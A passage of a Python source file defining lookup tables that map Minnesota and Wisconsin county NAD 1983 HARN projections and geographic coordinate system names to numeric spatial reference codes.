'NAD_1983_HARN_Adj_MN_Wadena_Feet': 103788, 'NAD_1983_HARN_Adj_MN_Waseca_Feet': 103789, 'NAD_1983_HARN_Adj_MN_Watonwan_Feet': 103790, 'NAD_1983_HARN_Adj_MN_Winona_Feet': 103791, 'NAD_1983_HARN_Adj_MN_Wright_Feet': 103792, 'NAD_1983_HARN_Adj_MN_Yellow_Medicine_Feet': 103793, 'NAD_1983_HARN_Adj_WI_Adams_Meters': 103800, 'NAD_1983_HARN_Adj_WI_Ashland_Meters': 103801, 'NAD_1983_HARN_Adj_WI_Barron_Meters': 103802, 'NAD_1983_HARN_Adj_WI_Brown_Meters': 103803, 'NAD_1983_HARN_Adj_WI_Buffalo_Meters': 103804, 'NAD_1983_HARN_Adj_WI_Calumet_Meters': 103805, 'NAD_1983_HARN_Adj_WI_Clark_Meters': 103806, 'NAD_1983_HARN_Adj_WI_Dodge_Meters': 103807, 'NAD_1983_HARN_Adj_WI_Door_Meters': 103808, 'NAD_1983_HARN_Adj_WI_Douglas_Meters': 103809, 'NAD_1983_HARN_Adj_WI_Dunn_Meters': 103810, 'NAD_1983_HARN_Adj_WI_Florence_Meters': 103811, 'NAD_1983_HARN_Adj_WI_Fond_du_Lac_Meters': 103812, 'NAD_1983_HARN_Adj_WI_Forest_Meters': 103813, 'NAD_1983_HARN_Adj_WI_Grant_Meters': 103814, 'NAD_1983_HARN_Adj_WI_Iowa_Meters': 103815, 'NAD_1983_HARN_Adj_WI_Iron_Meters': 103816, 'NAD_1983_HARN_Adj_WI_Jefferson_Meters': 103817, 'NAD_1983_HARN_Adj_WI_Juneau_Meters': 103818, 'NAD_1983_HARN_Adj_WI_Kenosha_Meters': 103819, 'NAD_1983_HARN_Adj_WI_Kewaunee_Meters': 103820, 'NAD_1983_HARN_Adj_WI_LaCrosse_Meters': 103821, 'NAD_1983_HARN_Adj_WI_Lincoln_Meters': 103822, 'NAD_1983_HARN_Adj_WI_Manitowoc_Meters': 103823, 'NAD_1983_HARN_Adj_WI_Marinette_Meters': 103824, 'NAD_1983_HARN_Adj_WI_Menominee_Meters': 103825, 'NAD_1983_HARN_Adj_WI_Milwaukee_Meters': 103826, 'NAD_1983_HARN_Adj_WI_Oconto_Meters': 103827, 'NAD_1983_HARN_Adj_WI_Outagamie_Meters': 103828, 'NAD_1983_HARN_Adj_WI_Ozaukee_Meters': 103829, 'NAD_1983_HARN_Adj_WI_Polk_Meters': 103830, 'NAD_1983_HARN_Adj_WI_Price_Meters': 103831, 'NAD_1983_HARN_Adj_WI_Racine_Meters': 103832, 'NAD_1983_HARN_Adj_WI_Rock_Meters': 103833, 'NAD_1983_HARN_Adj_WI_Rusk_Meters': 103834, 'NAD_1983_HARN_Adj_WI_St_Croix_Meters': 103835, 'NAD_1983_HARN_Adj_WI_Sauk_Meters': 103836, 
'NAD_1983_HARN_Adj_WI_Shawano_Meters': 103837, 'NAD_1983_HARN_Adj_WI_Sheboygan_Meters': 103838, 'NAD_1983_HARN_Adj_WI_Trempealeau_Meters': 103839, 'NAD_1983_HARN_Adj_WI_Washington_Meters': 103840, 'NAD_1983_HARN_Adj_WI_Waukesha_Meters': 103841, 'NAD_1983_HARN_Adj_WI_Waupaca_Meters': 103842, 'NAD_1983_HARN_Adj_WI_Winnebago_Meters': 103843, 'NAD_1983_HARN_Adj_WI_Bayfield_Meters': 103844, 'NAD_1983_HARN_Adj_WI_Burnett_Meters': 103845, 'NAD_1983_HARN_Adj_WI_Chippewa_Meters': 103846, 'NAD_1983_HARN_Adj_WI_Columbia_Meters': 103847, 'NAD_1983_HARN_Adj_WI_Crawford_Meters': 103848, 'NAD_1983_HARN_Adj_WI_Dane_Meters': 103849, 'NAD_1983_HARN_Adj_WI_EauClaire_Meters': 103850, 'NAD_1983_HARN_Adj_WI_Green_Meters': 103851, 'NAD_1983_HARN_Adj_WI_GreenLake_Meters': 103852, 'NAD_1983_HARN_Adj_WI_Jackson_Meters': 103853, 'NAD_1983_HARN_Adj_WI_Lafayette_Meters': 103854, 'NAD_1983_HARN_Adj_WI_Langlade_Meters': 103855, 'NAD_1983_HARN_Adj_WI_Marathon_Meters': 103856, 'NAD_1983_HARN_Adj_WI_Marquette_Meters': 103857, 'NAD_1983_HARN_Adj_WI_Monroe_Meters': 103858, 'NAD_1983_HARN_Adj_WI_Oneida_Meters': 103859, 'NAD_1983_HARN_Adj_WI_Pepin_Meters': 103860, 'NAD_1983_HARN_Adj_WI_Pierce_Meters': 103861, 'NAD_1983_HARN_Adj_WI_Portage_Meters': 103862, 'NAD_1983_HARN_Adj_WI_Richland_Meters': 103863, 'NAD_1983_HARN_Adj_WI_Sawyer_Meters': 103864, 'NAD_1983_HARN_Adj_WI_Taylor_Meters': 103865, 'NAD_1983_HARN_Adj_WI_Vernon_Meters': 103866, 'NAD_1983_HARN_Adj_WI_Vilas_Meters': 103867, 'NAD_1983_HARN_Adj_WI_Walworth_Meters': 103868, 'NAD_1983_HARN_Adj_WI_Washburn_Meters': 103869, 'NAD_1983_HARN_Adj_WI_Waushara_Meters': 103870, 'NAD_1983_HARN_Adj_WI_Wood_Meters': 103871, 'NAD_1983_HARN_Adj_WI_Adams_Feet': 103900, 'NAD_1983_HARN_Adj_WI_Ashland_Feet': 103901, 'NAD_1983_HARN_Adj_WI_Barron_Feet': 103902, 'NAD_1983_HARN_Adj_WI_Brown_Feet': 103903, 'NAD_1983_HARN_Adj_WI_Buffalo_Feet': 103904, 'NAD_1983_HARN_Adj_WI_Calumet_Feet': 103905, 'NAD_1983_HARN_Adj_WI_Clark_Feet': 103906, 'NAD_1983_HARN_Adj_WI_Dodge_Feet': 
103907, 'NAD_1983_HARN_Adj_WI_Door_Feet': 103908, 'NAD_1983_HARN_Adj_WI_Douglas_Feet': 103909, 'NAD_1983_HARN_Adj_WI_Dunn_Feet': 103910, 'NAD_1983_HARN_Adj_WI_Florence_Feet': 103911, 'NAD_1983_HARN_Adj_WI_Fond_du_Lac_Feet': 103912, 'NAD_1983_HARN_Adj_WI_Forest_Feet': 103913, 'NAD_1983_HARN_Adj_WI_Grant_Feet': 103914, 'NAD_1983_HARN_Adj_WI_Iowa_Feet': 103915, 'NAD_1983_HARN_Adj_WI_Iron_Feet': 103916, 'NAD_1983_HARN_Adj_WI_Jefferson_Feet': 103917, 'NAD_1983_HARN_Adj_WI_Juneau_Feet': 103918, 'NAD_1983_HARN_Adj_WI_Kenosha_Feet': 103919, 'NAD_1983_HARN_Adj_WI_Kewaunee_Feet': 103920, 'NAD_1983_HARN_Adj_WI_LaCrosse_Feet': 103921, 'NAD_1983_HARN_Adj_WI_Lincoln_Feet': 103922, 'NAD_1983_HARN_Adj_WI_Manitowoc_Feet': 103923, 'NAD_1983_HARN_Adj_WI_Marinette_Feet': 103924, 'NAD_1983_HARN_Adj_WI_Menominee_Feet': 103925, 'NAD_1983_HARN_Adj_WI_Milwaukee_Feet': 103926, 'NAD_1983_HARN_Adj_WI_Oconto_Feet': 103927, 'NAD_1983_HARN_Adj_WI_Outagamie_Feet': 103928, 'NAD_1983_HARN_Adj_WI_Ozaukee_Feet': 103929, 'NAD_1983_HARN_Adj_WI_Polk_Feet': 103930, 'NAD_1983_HARN_Adj_WI_Price_Feet': 103931, 'NAD_1983_HARN_Adj_WI_Racine_Feet': 103932, 'NAD_1983_HARN_Adj_WI_Rock_Feet': 103933, 'NAD_1983_HARN_Adj_WI_Rusk_Feet': 103934, 'NAD_1983_HARN_Adj_WI_St_Croix_Feet': 103935, 'NAD_1983_HARN_Adj_WI_Sauk_Feet': 103936, 'NAD_1983_HARN_Adj_WI_Shawano_Feet': 103937, 'NAD_1983_HARN_Adj_WI_Sheboygan_Feet': 103938, 'NAD_1983_HARN_Adj_WI_Trempealeau_Feet': 103939, 'NAD_1983_HARN_Adj_WI_Washington_Feet': 103940, 'NAD_1983_HARN_Adj_WI_Waukesha_Feet': 103941, 'NAD_1983_HARN_Adj_WI_Waupaca_Feet': 103942, 'NAD_1983_HARN_Adj_WI_Winnebago_Feet': 103943, 'NAD_1983_HARN_Adj_WI_Bayfield_Feet': 103944, 'NAD_1983_HARN_Adj_WI_Burnett_Feet': 103945, 'NAD_1983_HARN_Adj_WI_Chippewa_Feet': 103946, 'NAD_1983_HARN_Adj_WI_Columbia_Feet': 103947, 'NAD_1983_HARN_Adj_WI_Crawford_Feet': 103948, 'NAD_1983_HARN_Adj_WI_Dane_Feet': 103949, 'NAD_1983_HARN_Adj_WI_EauClaire_Feet': 103950, 'NAD_1983_HARN_Adj_WI_Green_Feet': 103951, 
'NAD_1983_HARN_Adj_WI_GreenLake_Feet': 103952, 'NAD_1983_HARN_Adj_WI_Jackson_Feet': 103953, 'NAD_1983_HARN_Adj_WI_Lafayette_Feet': 103954, 'NAD_1983_HARN_Adj_WI_Langlade_Feet': 103955, 'NAD_1983_HARN_Adj_WI_Marathon_Feet': 103956, 'NAD_1983_HARN_Adj_WI_Marquette_Feet': 103957, 'NAD_1983_HARN_Adj_WI_Monroe_Feet': 103958, 'NAD_1983_HARN_Adj_WI_Oneida_Feet': 103959, 'NAD_1983_HARN_Adj_WI_Pepin_Feet': 103960, 'NAD_1983_HARN_Adj_WI_Pierce_Feet': 103961, 'NAD_1983_HARN_Adj_WI_Portage_Feet': 103962, 'NAD_1983_HARN_Adj_WI_Richland_Feet': 103963, 'NAD_1983_HARN_Adj_WI_Sawyer_Feet': 103964, 'NAD_1983_HARN_Adj_WI_Taylor_Feet': 103965, 'NAD_1983_HARN_Adj_WI_Vernon_Feet': 103966, 'NAD_1983_HARN_Adj_WI_Vilas_Feet': 103967, 'NAD_1983_HARN_Adj_WI_Walworth_Feet': 103968, 'NAD_1983_HARN_Adj_WI_Washburn_Feet': 103969, 'NAD_1983_HARN_Adj_WI_Waushara_Feet': 103970, 'NAD_1983_HARN_Adj_WI_Wood_Feet': 103971 } class geographic(Projection): _projections = { 'GCS_Airy_1830': 4001, 'GCS_Airy_Modified': 4002, 'GCS_Australian': 4003, 'GCS_Bessel_1841': 4004, 'GCS_Bessel_Modified': 4005, 'GCS_Bessel_Namibia': 4006, 'GCS_Clarke_1858': 4007, 'GCS_Clarke_1866': 4008, 'GCS_Clarke_1866_Michigan': 4009, 'GCS_Clarke_1880_Benoit': 4010, 'GCS_Clarke_1880_IGN': 4011, 'GCS_Clarke_1880_RGS': 4012, 'GCS_Clarke_1880_Arc': 4013, 'GCS_Clarke_1880_SGA': 4014, 'GCS_Everest_Adj_1937': 4015, 'GCS_Everest_def_1967': 4016, 'GCS_Everest_Modified': 4018, 'GCS_GRS_1980': 4019, 'GCS_Helmert_1906': 4020, 'GCS_Indonesian': 4021, 'GCS_International_1924': 4022, 'GCS_International_1967': 4023, 'GCS_Krasovsky_1940': 4024, 'GCS_NWL_9D': 4025, 'GCS_Plessis_1817': 4027, 'GCS_Struve_1860': 4028, 'GCS_War_Office': 4029, 'GCS_GEM_10C': 4031, 'GCS_OSU_86F': 4032, 'GCS_OSU_91A': 4033, 'GCS_Clarke_1880': 4034, 'GCS_Sphere': 4035, 'GCS_GRS_1967': 4036, 'GCS_Everest_1830': 4042, 'GCS_Everest_def_1962': 4044, 'GCS_Everest_def_1975': 4045, 'GCS_Sphere_GRS_1980_Authalic': 4047, 'GCS_Sphere_Clarke_1866_Authalic': 4052, 
'GCS_Sphere_International_1924_Authalic': 4053, 'GCS_Hughes_1980': 4054, 'GCS_Greek': 4120, 'GCS_GGRS_1987': 4121, 'GCS_ATS_1977': 4122, 'GCS_KKJ': 4123, 'GCS_RT_1990': 4124, 'GCS_Samboja': 4125, 'GCS_LKS_1994': 4126, 'GCS_Tete': 4127, 'GCS_Madzansua': 4128, 'GCS_Observatario': 4129, 'GCS_Moznet': 4130, 'GCS_Indian_1960': 4131, 'GCS_FD_1958': 4132, 'GCS_Estonia_1992': 4133, 'GCS_PDO_1993': 4134, 'GCS_Old_Hawaiian': 4135, 'GCS_St_Lawrence_Island': 4136, 'GCS_St_Paul_Island': 4137, 'GCS_St_George_Island': 4138, 'GCS_Puerto_Rico': 4139, 'GCS_North_American_1983_CSRS': 4140, 'GCS_Israel': 4141, 'GCS_Locodjo_1965': 4142, 'GCS_Abidjan_1987': 4143, 'GCS_Kalianpur_1937': 4144, 'GCS_Kalianpur_1962': 4145, 'GCS_Kalianpur_1975': 4146, 'GCS_Hanoi_1972': 4147, 'GCS_Hartebeesthoek_1994': 4148, 'GCS_CH1903': 4149, 'GCS_CH1903+': 4150, 'GCS_Swiss_TRF_1995': 4151, 'GCS_North_American_1983_HARN': 4152, 'GCS_Rassadiran': 4153, 'GCS_European_1950_ED77': 4154, 'GCS_Dabola_1981': 4155, 'GCS_S_JTSK': 4156, 'GCS_Mount_Dillon': 4157, 'GCS_Naparima_1955': 4158, 'GCS_European_Libyan_Datum_1979': 4159, 'GCS_Chos_Malal_1914': 4160, 'GCS_Pampa_del_Castillo': 4161, 'GCS_Korean_Datum_1985': 4162, 'GCS_Yemen_NGN_1996': 4163, 'GCS_South_Yemen': 4164, 'GCS_Bissau': 4165, 'GCS_Korean_Datum_1995': 4166, 'GCS_NZGD_2000': 4167, 'GCS_Accra': 4168, 'GCS_American_Samoa_1962': 4169, 'GCS_SIRGAS': 4170, 'GCS_RGF_1993': 4171, 'GCS_POSGAR': 4172, 'GCS_IRENET95': 4173, 'GCS_Sierra_Leone_1924': 4174, 'GCS_Sierra_Leone_1968': 4175, 'GCS_Australian_Antarctic_1998': 4176, 'GCS_Pulkovo_1942_Adj_1983': 4178, 'GCS_Pulkovo_1942_Adj_1958': 4179, 'GCS_Estonia_1997': 4180, 'GCS_Luxembourg_1930': 4181, 'GCS_Azores_Occidental_1939': 4182, 'GCS_Azores_Central_1948': 4183, 'GCS_Azores_Oriental_1940': 4184, 'GCS_Madeira_1936': 4185, 'GCS_OSNI_1952': 4188, 'GCS_REGVEN': 4189, 'GCS_POSGAR_1998': 4190, 'GCS_Albanian_1987': 4191, 'GCS_Douala_1948': 4192, 'GCS_Manoca_1962': 4193, 'GCS_Qornoq_1927': 4194, 'GCS_Scoresbysund_1952': 
4195, 'GCS_Ammassalik_1958': 4196, 'GCS_Kousseri': 4198, 'GCS_Egypt_1930': 4199, 'GCS_Pulkovo_1995': 4200, 'GCS_Adindan': 4201, 'GCS_Australian_1966': 4202, 'GCS_Australian_1984': 4203, 'GCS_Ain_el_Abd_1970': 4204, 'GCS_Afgooye': 4205, 'GCS_Agadez': 4206, 'GCS_Lisbon': 4207, 'GCS_Aratu': 4208, 'GCS_Arc_1950': 4209, 'GCS_Arc_1960': 4210, 'GCS_Batavia': 4211, 'GCS_Barbados_1938': 4212, 'GCS_Beduaram': 4213, 'GCS_Beijing_1954': 4214, 'GCS_Belge_1950': 4215, 'GCS_Bermuda_1957': 4216, 'GCS_Bern_1898': 4217, 'GCS_Bogota': 4218, 'GCS_Bukit_Rimpah': 4219, 'GCS_Camacupa': 4220, 'GCS_Campo_Inchauspe': 4221, 'GCS_Cape': 4222, 'GCS_Carthage': 4223, 'GCS_Chua': 4224, 'GCS_Corrego_Alegre': 4225, 'GCS_Cote_d_Ivoire': 4226, 'GCS_Deir_ez_Zor': 4227, 'GCS_Douala': 4228, 'GCS_Egypt_1907': 4229, 'GCS_European_1950': 4230, 'GCS_European_1987': 4231, 'GCS_Fahud': 4232, 'GCS_Gandajika_1970': 4233, 'GCS_Garoua': 4234, 'GCS_Guyane_Francaise': 4235, 'GCS_Hu_Tzu_Shan': 4236, 'GCS_Hungarian_1972': 4237, 'GCS_Indonesian_1974': 4238, 'GCS_Indian_1954': 4239, 'GCS_Indian_1975': 4240, 'GCS_Jamaica_1875': 4241, 'GCS_Jamaica_1969': 4242, 'GCS_Kalianpur_1880': 4243, 'GCS_Kandawala': 4244, 'GCS_Kertau': 4245, 'GCS_Kuwait_Oil_Company': 4246, 'GCS_La_Canoa': 4247, 'GCS_Provisional_S_American_1956': 4248, 'GCS_Lake': 4249, 'GCS_Leigon': 4250, 'GCS_Liberia_1964': 4251, 'GCS_Lome': 4252, 'GCS_Luzon_1911': 4253, 'GCS_Hito_XVIII_1963': 4254, 'GCS_Herat_North': 4255, 'GCS_Mahe_1971': 4256, 'GCS_Makassar': 4257, 'GCS_ETRS_1989': 4258, 'GCS_Malongo_1987': 4259, 'GCS_Manoca': 4260, 'GCS_Merchich': 4261, 'GCS_Massawa': 4262, 'GCS_Minna': 4263, 'GCS_Mhast': 4264, 'GCS_Monte_Mario': 4265, 'GCS_Mporaloko': 4266, 'GCS_North_American_1927': 4267, 'GCS_North_American_Michigan': 4268, 'GCS_North_American_1983': 4269, 'GCS_Nahrwan_1967': 4270, 'GCS_Naparima_1972': 4271, 'GCS_New_Zealand_1949': 4272, 'GCS_NGO_1948': 4273, 'GCS_Datum_73': 4274, 'GCS_NTF': 4275, 'GCS_NSWC_9Z_2': 4276, 'GCS_OSGB_1936': 4277, 
'GCS_OSGB_1970_SN': 4278, 'GCS_OS_SN_1980': 4279, 'GCS_Padang_1884': 4280, 'GCS_Palestine_1923': 4281, 'GCS_Pointe_Noire': 4282, 'GCS_GDA_1994': 4283, 'GCS_Pulkovo_1942': 4284, 'GCS_Qatar_1974': 4285, 'GCS_Qatar_1948': 4286, 'GCS_Qornoq': 4287, 'GCS_Loma_Quintana': 4288, 'GCS_Amersfoort': 4289, 'GCS_South_American_1969': 4291, 'GCS_Sapper_Hill_1943': 4292, 'GCS_Schwarzeck': 4293, 'GCS_Segora': 4294, 'GCS_Serindung': 4295, 'GCS_Sudan': 4296, 'GCS_Tananarive_1925': 4297, 'GCS_Timbalai_1948': 4298, 'GCS_TM65': 4299, 'GCS_TM75': 4300, 'GCS_Tokyo': 4301, 'GCS_Trinidad_1903': 4302, 'GCS_Trucial_Coast_1948': 4303, 'GCS_Voirol_1875': 4304, 'GCS_Voirol_Unifie_1960': 4305, 'GCS_Bern_1938': 4306, 'GCS_Nord_Sahara_1959': 4307, 'GCS_RT38': 4308, 'GCS_Yacare': 4309, 'GCS_Yoff': 4310, 'GCS_Zanderij': 4311, 'GCS_MGI': 4312, 'GCS_Belge_1972': 4313, 'GCS_Deutsches_Hauptdreiecksnetz': 4314, 'GCS_Conakry_1905': 4315, 'GCS_Dealul_Piscului_1933': 4316, 'GCS_Dealul_Piscului_1970': 4317, 'GCS_NGN': 4318, 'GCS_KUDAMS': 4319, 'GCS_WGS_1972': 4322, 'GCS_WGS_1972_BE': 4324, 'GCS_WGS_1984': 4326, 'GCS_Montserrat_1958': 4404, 'GCS_Anguilla_1957': 4600, 'GCS_Antigua_1943': 4601, 'GCS_Dominica_1945': 4602, 'GCS_Grenada_1953': 4603, 'GCS_St_Kitts_1955': 4605, 'GCS_St_Lucia_1955': 4606, 'GCS_St_Vincent_1945': 4607, 'GCS_NAD_1927_Definition_1976': 4608, 'GCS_NAD_1927_CGQ77': 4609, 'GCS_Xian_1980': 4610, 'GCS_Hong_Kong_1980': 4611, 'GCS_JGD_2000': 4612, 'GCS_Gunung_Segara': 4613, 'GCS_QND_1995': 4614, 'GCS_Porto_Santo_1936': 4615, 'GCS_Selvagem_Grande_1938': 4616, 'GCS_North_American_1983_CSRS': 4617, 'GCS_South_American_1969': 4618, 'GCS_SWEREF99': 4619, 'GCS_Point_58': 4620, 'GCS_Fort_Marigot': 4621, 'GCS_Sainte_Anne': 4622, 'GCS_CSG_1967': 4623, 'GCS_RGFG_1995': 4624, 'GCS_Fort_Desaix': 4625, 'GCS_Reunion_1947': 4626, 'GCS_RGR_1992': 4627, 'GCS_Tahiti_1952': 4628, 'GCS_Tahaa_1954': 4629, 'GCS_IGN72_Nuku_Hiva': 4630, 'GCS_K0_1949': 4631, 'GCS_Combani_1950': 4632, 'GCS_IGN56_Lifou': 4633, 
'GCS_Petrels_1972': 4636, 'GCS_Pointe_Geologie_Perroud_1950': 4637, 'GCS_Saint_Pierre_et_Miquelon_1950': 4638, 'GCS_MOP78': 4639, 'GCS_RRAF_1991': 4640, 'GCS_IGN53_Mare': 4641, 'GCS_ST84_Ile_des_Pins': 4642, 'GCS_ST71_Belep': 4643, 'GCS_NEA74_Noumea': 4644, 'GCS_RGNC_1991': 4645, 'GCS_Grand_Comoros': 4646, 'GCS_Reykjavik_1900': 4657, 'GCS_Hjorsey_1955': 4658, 'GCS_ISN_1993': 4659, 'GCS_Helle_1954': 4660, 'GCS_LKS_1992': 4661, 'GCS_IGN72_Grande_Terre': 4662, 'GCS_Porto_Santo_1995': 4663, 'GCS_Azores_Oriental_1995': 4664, 'GCS_Azores_Central_1995': 4665, 'GCS_Lisbon_1890': 4666, 'GCS_IKBD_1992': 4667, 'GCS_European_1979': 4668, 'GCS_LKS_1994': 4669, 'GCS_IGM_1995': 4670, 'GCS_Voirol_1879': 4671, 'GCS_Chatham_Island_1971': 4672, 'GCS_Chatham_Islands_1979': 4673, 'GCS_SIRGAS_2000': 4674, 'GCS_Guam_1963': 4675, 'GCS_Vientiane_1982': 4676, 'GCS_Lao_1993': 4677, 'GCS_Lao_1997': 4678, 'GCS_Jouik_1961': 4679, 'GCS_Nouakchott_1965': 4680, 'GCS_Gulshan_303': 4682, 'GCS_PRS_1992': 4683, 'GCS_Gan_1970': 4684, 'GCS_MAGNA': 4686, 'GCS_RGPF': 4687, 'GCS_Fatu_Iva_1972': 4688, 'GCS_IGN63_Hiva_Oa': 4689, 'GCS_Tahiti_1979': 4690, 'GCS_Moorea_1987': 4691, 'GCS_Maupiti_1983': 4692, 'GCS_Nakhl-e_Ghanem': 4693, 'GCS_POSGAR_1994': 4694, 'GCS_Katanga_1955': 4695, 'GCS_Kasai_1955': 4696, 'GCS_IGC_1962_6th_Parallel_South': 4697, 'GCS_Kerguelen_Island_1949': 4698, 'GCS_Le_Pouce_1934': 4699, 'GCS_IGN_Astro_1960': 4700, 'GCS_IGCB_1955': 4701, 'GCS_Mauritania_1999': 4702, 'GCS_Mhast_1951': 4703, 'GCS_Mhast_Onshore': 4704, 'GCS_Mhast_Offshore': 4705, 'GCS_Egypt_Gulf_of_Suez_S-650_TL': 4706, 'GCS_Tern_Island_1961': 4707, 'GCS_Anna_1_1965': 4708, 'GCS_Beacon_E_1945': 4709, 'GCS_DOS_71_4': 4710, 'GCS_Astro_1952': 4711, 'GCS_Ascension_Island_1958': 4712, 'GCS_Ayabelle': 4713, 'GCS_Bellevue_IGN': 4714, 'GCS_Camp_Area': 4715, 'GCS_Canton_1966': 4716, 'GCS_Cape_Canaveral': 4717, 'GCS_Solomon_1968': 4718, 'GCS_Easter_Island_1967': 4719, 'GCS_Fiji_1986': 4720, 'GCS_Fiji_1956': 4721, 'GCS_ISTS_061_1968': 
4722, 'GCS_Grand_Cayman_1959': 4723, 'GCS_ISTS_073_1969': 4724, 'GCS_Johnston_Island_1961': 4725, 'GCS_Little_Cayman_1961': 4726, 'GCS_Midway_1961': 4727, 'GCS_Pico_de_Las_Nieves': 4728, 'GCS_Pitcairn_1967': 4729, 'GCS_Santo_DOS_1965': 4730, 'GCS_Viti_Levu_1916': 4731, 'GCS_Wake_Eniwetok_1960': 4732, 'GCS_Wake_Island_1952': 4733, 'GCS_Tristan_1968': 4734, 'GCS_Kusaie_1951': 4735, 'GCS_Deception_Island': 4736, 'GCS_Korea_2000': 4737, 'GCS_Hong_Kong_1963': 4738, 'GCS_Hong_Kong_1963_67': 4739, 'GCS_PZ_1990': 4740, 'GCS_FD_1954': 4741, 'GCS_GDM_2000': 4742, 'GCS_Karbala_1979_Polservice': 4743, 'GCS_Nahrwan_1934': 4744, 'GCS_RD/83': 4745, 'GCS_PD/83': 4746, 'GCS_Greenland_1996': 4747, 'GCS_Vanua_Levu_1915': 4748, 'GCS_RGNC_1991-93': 4749, 'GCS_ST87_Ouvea': 4750, 'GCS_fk89': 4753, 'GCS_LGD2006': 4754, 'GCS_DGN_1995': 4755, 'GCS_VN_2000': 4756, 'GCS_SVY21': 4757, 'GCS_JAD_2001': 4758, 'GCS_NAD_1983_NSRS2007': 4759, 'GCS_WGS_1966': 4760, 'GCS_Bern_1898_Bern': 4801, 'GCS_Bogota_Bogota': 4802, 'GCS_Lisbon_Lisbon': 4803, 'GCS_Makassar_Jakarta': 4804, 'GCS_MGI_Ferro': 4805, 'GCS_Monte_Mario_Rome': 4806, 'GCS_NTF_Paris': 4807, 'GCS_Padang_1884_Jakarta': 4808, 'GCS_Belge_1950_Brussels': 4809, 'GCS_Tananarive_1925_Paris': 4810, 'GCS_Voirol_1875_Paris': 4811, 'GCS_Voirol_Unifie_1960_Paris': 4812, 'GCS_Batavia_Jakarta': 4813, 'GCS_RT38_Stockholm': 4814, 'GCS_Greek_Athens': 4815, 'GCS_Carthage_Paris': 4816, 'GCS_NGO_1948_Oslo': 4817, 'GCS_S_JTSK_Ferro': 4818, 'GCS_Nord_Sahara_1959_Paris': 4819, 'GCS_Gunung_Segara_Jakarta': 4820, 'GCS_Voirol_1879_Paris': 4821, 'GCS_ITRF_2005': 4896, 'GCS_ATF_Paris': 4901, 'GCS_Nord_de_Guerre_Paris': 4902, 'GCS_Madrid_1870_Madrid': 4903, 'GCS_Lisbon_1890_Lisbon': 4904, 'GCS_WGS_1966': 37001, 'GCS_Fischer_1960': 37002, 'GCS_Fischer_1968': 37003, 'GCS_Fischer_Modified': 37004, 'GCS_Hough_1960': 37005, 'GCS_Everest_Modified_1969': 37006, 'GCS_Walbeck': 37007, 'GCS_Sphere_ARC_INFO': 37008, 'GCS_European_1979': 37201, 'GCS_Everest_Bangladesh': 37202, 
'GCS_Everest_India_Nepal': 37203, 'GCS_Hjorsey_1955': 37204, 'GCS_Hong_Kong_1963_67': 37205, 'GCS_Oman': 37206, 'GCS_South_Asia_Singapore': 37207, 'GCS_Ayabelle': 37208, 'GCS_Point_58': 37211, 'GCS_Beacon_E_1945': 37212, 'GCS_Tern_Island_1961': 37213, 'GCS_Astro_1952': 37214, 'GCS_Bellevue_IGN': 37215, 'GCS_Canton_1966': 37216, 'GCS_Chatham_Island_1971': 37217, 'GCS_DOS_1968': 37218, 'GCS_Easter_Island_1967': 37219, 'GCS_Guam_1963': 37220, 'GCS_GUX_1': 37221, 'GCS_Johnston_Island_1961': 37222, 'GCS_Carthage_Degree': 37223, 'GCS_Midway_1961': 37224, 'GCS_Pitcairn_1967': 37226, 'GCS_Santo_DOS_1965': 37227, 'GCS_Viti_Levu_1916': 37228, 'GCS_Wake_Eniwetok_1960': 37229, 'GCS_Wake_Island_1952': 37230, 'GCS_Anna_1_1965': 37231, 'GCS_Gan_1970': 37232, 'GCS_ISTS_073_1969': 37233, 'GCS_Kerguelen_Island_1949': 37234, 'GCS_Reunion_1947': 37235, 'GCS_Ascension_Island_1958': 37237, 'GCS_DOS_71_4': 37238, 'GCS_Cape_Canaveral': 37239, 'GCS_Fort_Thomas_1955': 37240, 'GCS_Graciosa_Base_SW_1948': 37241, 'GCS_ISTS_061_1968': 37242, 'GCS_LC5_1961': 37243, 'GCS_Observ_Meteorologico_1939': 37245, 'GCS_Pico_de_Las_Nieves': 37246, 'GCS_Porto_Santo_1936': 37247, 'GCS_Sao_Braz': 37249, 'GCS_Selvagem_Grande_1938': 37250, 'GCS_Tristan_1968': 37251, 'GCS_American_Samoa_1962': 37252, 'GCS_Camp_Area': 37253, 'GCS_Deception_Island': 37254, 'GCS_Gunung_Segara': 37255, 'GCS_S42_Hungary': 37257, 'GCS_Kusaie_1951': 37259, 'GCS_Alaskan_Islands': 37260, 'GCS_Assumed_Geographic_1': 104000, 'GCS_Estonia_1937': 104101, 'GCS_Hermannskogel': 104102, 'GCS_Sierra_Leone_1960': 104103, 'GCS_Hong_Kong_1980': 104104, 'GCS_Datum_Lisboa_Bessel': 104105, 'GCS_Datum_Lisboa_Hayford': 104106, 'GCS_RGF_1993': 104107, 'GCS_NZGD_2000': 104108, 'GCS_Pohnpei': 104109, 'GCS_REGVEN': 104110, 'GCS_JGD_2000': 104111, 'GCS_Bab_South': 104112, 'GCS_Majuro': 104113, 'GCS_Bermuda_2000': 104114, 'GCS_ITRF_1988': 104115, 'GCS_ITRF_1989': 104116, 'GCS_ITRF_1990': 104117, 'GCS_ITRF_1991': 104118, 'GCS_ITRF_1992': 104119, 
'GCS_ITRF_1993': 104120, 'GCS_ITRF_1994': 104121, 'GCS_ITRF_1996': 104122, 'GCS_ITRF_1997': 104123, 'GCS_ITRF_2000': 104124, 'GCS_Chatham_Islands_1979': 104125, 'GCS_Observatorio_Meteorologico_1965': 104126, 'GCS_Roma_1940': 104127, 'GCS_Sphere_EMEP': 104128, 'GCS_EUREF_FIN': 104129, 'GCS_Jordan': 104130, 'GCS_D48': 104131, 'GCS_Ocotepeque_1935': 104132, 'GCS_JAD_2001': 104133, 'GCS_MONREF_1997': 104134, 'GCS_MSK_1942': 104135, 'GCS_TWD_1967': 104136, 'GCS_TWD_1997': 104137, 'GCS_WGS_1984_Major_Auxiliary_Sphere': 104199, 'GCS_ETRF_1989': 104258, 'GCS_Merchich_Degree': 104261, 'GCS_Voirol_1875_Degree': 104304, 'GCS_Voirol_Unifie_1960_Degree': 104305, 'GCS_NAD_1983_HARN_Adj_MN_Anoka': 104700, 'GCS_NAD_1983_HARN_Adj_MN_Becker': 104701, 'GCS_NAD_1983_HARN_Adj_MN_Beltrami_North': 104702, 'GCS_NAD_1983_HARN_Adj_MN_Beltrami_South': 104703, 'GCS_NAD_1983_HARN_Adj_MN_Benton': 104704, 'GCS_NAD_1983_HARN_Adj_MN_Big_Stone': 104705, 'GCS_NAD_1983_HARN_Adj_MN_Blue_Earth': 104706, 'GCS_NAD_1983_HARN_Adj_MN_Brown': 104707, 'GCS_NAD_1983_HARN_Adj_MN_Carlton': 104708, 'GCS_NAD_1983_HARN_Adj_MN_Carver': 